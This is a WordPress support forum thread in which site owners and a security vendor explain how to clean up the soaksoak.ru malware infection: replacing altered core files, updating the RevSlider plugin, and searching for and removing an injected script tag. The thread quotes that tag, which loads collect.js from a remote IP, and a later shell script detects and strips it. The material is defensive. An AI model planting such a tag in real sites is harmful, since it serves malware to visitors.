Support » Fixing WordPress » soaksoak.ru Malware

  • Recently, a client's site was infected with malware from soaksoak.ru on a WordPress website running version 4.0.1. It seems it was a massive attack and many people are reporting the same security problem over the net. You may receive a warning from your browser.

    It seems the attack modifies two WordPress core files:

    template-loader.php (located at: /wp-includes/template-loader.php)
    swfobject.js (located at: /wp-includes/js/swfobject.js)

    I fixed the problem by replacing the modified files. To do so, download a fresh installation of WordPress at:

    https://wordpress.org/download/

    Upload and replace the modified files.

    *Make sure your WordPress site is up to date, update all your plugins too.

    It's a good idea to install a security plugin like Wordfence or Sucuri scanner.

    *Important: When the issue is fixed, request a Google review to avoid further browser warnings. Instructions to do this:

    https://support.google.com/webmasters/answer/2600725?hl=en

    I hope this helps you fix the soaksoak.ru WordPress malware.

Viewing 14 replies - 1 through 14 (of 14 total)
  • OK so one replaces the two corrupted files. What’s to stop the attacker (or attack bot) simply modifying them again?

    Would it not be a tad premature to ask Google for a review before this is fixed properly?

    Hi @euclides, thank you. I have replaced both files and updated the WP version.

    Why is the warning still appearing? Do I have to wait for the review from Google? Thank you.

    Daniel Cid

    (@ddsucurinet)

    Sucuri.net Support

    You have to update revslider and clean the admin user list from the database to prevent reinfections.

    We shared more details here:

    http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

    I don’t use revslider, but still had this happen to a couple of my sites.

    Hi all.
    Maybe adding a "rewrite rule" to your .htaccess could help. I've had a problem with a spam shell script two days ago (it was hosted in the Uploads folder), and adding the following rule seems to be effective:
    RewriteRule ^xmlrpc\.php$ "http\:\/\/0\.0\.0\.0\/" [R=301,L]
    So adding a rule according to your needs could help until WP is updated.

    hello,

    If you have 20 websites on the server it is hard to update them all.

    Is there a way to cut this line of code out of the whole server, from each php file?

    here is the line:
    <script language="JavaScript" src="http://122.155.168.105/ads/inpage/pub/collect.js" type="text/javascript"></script>

    I am sure there is a way. It will be helpful if anyone can save us some time and help.

    thank you

    WPyogi

    (@wpyogi)

    Forum Moderator

    @lukeoko – please don’t post the same question in multiple places – it’s just confusing and messy. See your post here:

    https://wordpress.org/support/topic/malware-removal-from-the-server?replies=2

    OK so one replaces the two corrupted files. What’s to stop the attacker (or attack bot) simply modifying them again?

    BulletProof Security. .htaccess = access, and BulletProof *stops* malicious access. Wordfence and Sucuri do other important things, but I have *never* had an intrusion because BulletProof is my doorman.

    My company is running 8 websites on shared hosting; some websites are static and others are running on WordPress. Three days back all our websites got infected.

    First of all I tracked down the root of the problem: it was a folder in one of my websites containing a php file named "worm.php".

    Step 1: Remove the folder containing worm.php.
    Step 2: Go to the WordPress admin panel >> Appearance >> Editor >> header.php
    Step 3: Hit Ctrl+F and search for

    <script language="JavaScript" src="http://122.155.168.105/ads/inpage/pub/collect.js" type="text/javascript"></script>

    Step 4: Delete all the results of the above line.
    Step 5: Save the file.

    50 percent of the problem is solved.

    Now you have to log in to your FTP and check for recently updated files (there would be 4-5 files). Open these recently updated files one by one and repeat Step 3, Step 4 and Step 5 mentioned above.

    Now your website will be working, but you still have to make sure that no malicious code stays hidden in some file.

    Go to the WordPress admin panel and update your WordPress.

    In some cases you will get an internal server error while trying to access http://www.yourwebsite.com/wp-admin. In that case you have to upload fresh copies of the wp-admin and wp-includes folders and the wp-login.php file.
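    An added example (not from this thread) that scripts the search-and-delete steps above: it lists every file under a WordPress root that references the injected collect.js tag or its host 122.155.168.105, lists recently modified files as the FTP step suggests, and strips the tag in place while keeping a .bak copy. The sample site tree and its file names are constructed here; point the functions at a real document root instead.

```shell
#!/bin/sh
# Added example, not from the thread. Finds and removes the injected
# collect.js tag across a WordPress tree and lists recently changed files.
set -eu

IOC_IP='122.155.168.105'                # host from the injected tag
IOC_PATH='ads/inpage/pub/collect.js'    # script path from the injected tag
IOC_RE=$(printf '%s' "$IOC_IP" | sed 's/\./\\./g')   # dots escaped for sed

# Constructed sample tree standing in for a real site (assumption).
SAMPLE_ROOT=$(mktemp -d)
mkdir -p "$SAMPLE_ROOT/wp-content/themes/demo" "$SAMPLE_ROOT/wp-includes"
printf '<html><head>\n<script language="JavaScript" src="http://%s/%s" type="text/javascript"></script><title>x</title>\n</head>\n' \
  "$IOC_IP" "$IOC_PATH" > "$SAMPLE_ROOT/wp-content/themes/demo/header.php"
printf '<?php // clean file\n' > "$SAMPLE_ROOT/index.php"

# Print every file under $1 (ignoring *.bak backups) that mentions the
# injected host or script path.
find_infected() {
  find "$1" -type f ! -name '*.bak' \
    -exec grep -lF -e "$IOC_IP" -e "$IOC_PATH" {} + || true
}

# Print files under $1 modified within the last $2 days (default 3): the
# "recently updated files" the FTP step asks you to open by hand.
recent_files() {
  find "$1" -type f -mtime "-${2:-3}" -print | sort
}

# Strip only the injected <script ...host...></script> tag from $1, keeping
# the rest of the line, and leave the original as $1.bak for comparison.
clean_file() {
  cp -p "$1" "$1.bak"
  sed "s#<script[^>]*${IOC_RE}[^>]*></script>##g" "$1.bak" > "$1"
}

# Stand-alone run over the sample tree: report, do not modify.
echo "files referencing the injected script:"; find_infected "$SAMPLE_ROOT"
echo "files changed in the last 3 days:";      recent_files "$SAMPLE_ROOT" 3
```

    Run clean_file on each path that find_infected prints, then diff each file against its .bak before deleting the backup.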

    Hi,
    how can I see which files they are? I'm looking for the recently updated files.

    Hi heffernan1966, the first thing would be to update the Slider Revolution plugin (if you don't have a license, delete it from the server until you get one). Then download a fresh copy of WordPress and replace the infected files:

    template-loader.php (located at: /wp-includes/template-loader.php)
    swfobject.js (located at: /wp-includes/js/swfobject.js)

    Update all your plugins and WordPress core and make sure to secure your installation by following best practices:

    http://codex.wordpress.org/Hardening_WordPress

    Hi,
    how can I see which files they are? I'm looking for the recently updated files.

    Hello dear,

    Just follow steps 2, 3 & 4:

    Step 1: Remove the folder containing worm.php.
    Step 2: Go to the WordPress admin panel >> Appearance >> Editor >> header.php
    Step 3: Hit Ctrl+F and search for
    <script language="JavaScript" src="http://122.155.168.105/ads/inpage/pub/collect.js" type="text/javascript"></script>

    If you do not find anything with the above query, just search for

    122.155.168.105

    If you still do not find anything, recheck the above IP address against the IP address mentioned in the Google Chrome error page; if they do not match, then you have to search for the IP address mentioned in the Google Chrome error page.

    Now you can proceed further with steps 4 & 5.

    Now you have to log in to your FTP and check for recently updated files (there would be 4-5 files). Open these recently updated files one by one and repeat Step 3, Step 4 and Step 5 mentioned above.

    The above files would be index files and login files.

    I hope this helps you to resolve the problem.

    Hi all,

    I had Revslider installed on 6 sites.

    I believe I have gotten all of the malware and potential issues taken care of, but still my templates are not loading correctly.

    I’m currently 3 hours into trying to figure out a resolution and would be happy to pay someone $100 to fix this for me.

    Is anyone game to take care of this for me?

    Thank you,

    Jonathan

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator 🚀

    strive4impact, please don’t just dive into someone else’s thread like this.

    As for the offer to pay, please try one of the following sites and do not accept any offers given on these forums:

  • The topic ‘soaksoak.ru Malware’ is closed to new replies.